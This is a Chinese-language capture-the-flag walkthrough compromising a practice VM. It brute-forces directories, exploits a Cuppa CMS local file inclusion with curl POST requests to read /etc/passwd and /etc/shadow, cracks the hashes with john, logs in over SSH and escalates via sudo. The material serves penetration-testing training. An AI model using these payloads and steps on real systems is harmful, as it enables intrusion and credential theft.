3、Web渗透
直接访问目标ip地址,查看靶机80端口的web服务,发现是个apache的主页
使用dirsearch对目标主机80端口的web服务进行目录爆破
dirsearch -u 192.168.88.131
爆出两个可疑目录/administrator和/wordpress( wordpress这个框架存在很多)
也可使用dirb命令实现目录爆破
结果同上
我们对/administrator目录进行访问
尝试安装,但在添加完信息之后发现没有Administrator创建权限
而/wordpress目录则无法访问
从网站的标题可以看出是该网站的cms为Cuppa,
也可以使用whatweb命令查询
使用searchsploit命令查询Cuppa cms是否存在
searchsploit cuppa cms
发现存在一处详情保存在25971.txt中, 将它导出来
searchsploit cuppa cms -m 25971.txt
查看漏洞详情得知, 该cms可通过文件包含读取任意文件
文件中描述说,/alerts/alertConfigField.php文件urlConfig参数存在LFI(PHP本地文件包含),可以利用特殊的url,查看本地文件
并且给出了几个payload
使用第二个payload尝试,target就是靶机ip,cuppa是显示cuppa信息的访问页面,即administrator
http://192.168.88.131/administrator/alerts/alertConfigField.php?
urlConfig=../../../../../../../../../etc/passwd
没有回显
由于url里是get请求,我们换用post请求再试试
使用curl命令提交Post请求:
curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.88.131/administrator/alerts/alertConfigField.php
成功得到目标主机的passwd文件内容
用同样的方法尝试读取shadow文件,该文件是用来存放用户名密码的
curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.88.131/administrator/alerts/alertConfigField.php
发现两处很明显的用户信息
分别对应着www-data用户:加密密码,w1r3s用户:加密密码
4、john爆破
创建一个新文本将shadow内两处用户信息保存进去
使用john命令进行破解
破解成功,得到:
用户 www-data 密码 www-data
用户 w1r3s 密码 computer
注意:
john命令无法再次解密同一个文件
需要先执行命令
rm -r /root/.john/john.pot
删除john.pot文件才能再次解密 (john.pot存放解密过的字符串)
也就是说当你后面再次复现或者重复去John爆破时需要先remove掉上述文件
5、ssh远程登录
因为开放了22端口,所以可利用得到的客户端用户名及靶机ip来进行ssh连接
命令格式: ssh 客户端用户名@服务器ip地址
ssh w1r3s@192.168.88.131
远程登录成功
whoami 查看一下当前用户是谁
uname -a 查看系统状态
sudo -l 查看当前用户权限
可以看到当前用户具有所有权限
6、sudo提权
因为w1r3s这个用户具有全权限,这里可以直接提权至root用户
sudo su (sudo可以理解为以管理员身份运行,即以root用户执行命令,su是切换用户)
提权成功
切换到root根目录,直接找到flag
至此,我们已经完全拿下整台靶机